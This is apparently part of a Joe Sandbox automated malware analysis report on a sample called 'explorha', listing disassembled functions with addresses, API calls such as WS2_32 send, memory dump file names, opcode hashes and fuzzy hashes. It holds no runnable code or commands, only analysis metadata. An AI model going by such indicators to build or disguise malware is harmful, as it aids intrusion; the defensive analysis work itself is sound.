                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0073E110 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                        • Instruction ID: dcea59b335d4bbad62b031148a89944bf090b059d51f7f88ee544913292c86cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89B12732900695DFEB15CF68C881BAEBBE5EF55300F24816AE855DB383D63C9D01CB61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070D2DC Relevance: 6.2, APIs: 4, Instructions: 168networkCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • send.WS2_32(?,?,00000004,00000000), ref: 0070D43E
                                                                                                                                                                                                                                        • send.WS2_32(?,?,00000008,00000000), ref: 0070D47A
                                                                                                                                                                                                                                        • send.WS2_32(?,?,?,00000000), ref: 0070D4BC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: send
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                                                                                        • Opcode ID: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction ID: de6d1e44175e4cde55b6a2ad460fe1b4b71adf537b0e39bf1d63b82ca77bd574
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7241D872E00214DBDB288BBCDC957AEB7B4AF45324F104369EC19E33D1DA38AD408B95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0071D202 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction ID: 3ace18804f7452dd607bd0150a9767cece3538ce40f37e3bfa77f63bba975bd4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25212C75A00219EFDF10EFA8DC859EEBBB9BF49314F100055F901A7291D6789E819BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0074097F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                        • String ID: 8Bv$`Gv
                                                                                                                                                                                                                                        • API String ID: 3903695350-1396405441
                                                                                                                                                                                                                                        • Opcode ID: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
                                                                                                                                                                                                                                        • Instruction ID: d03ecb5a9f5dcac42f9a4a0f19f5e475cf2bda1515162e2575b73cb7eeab06bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
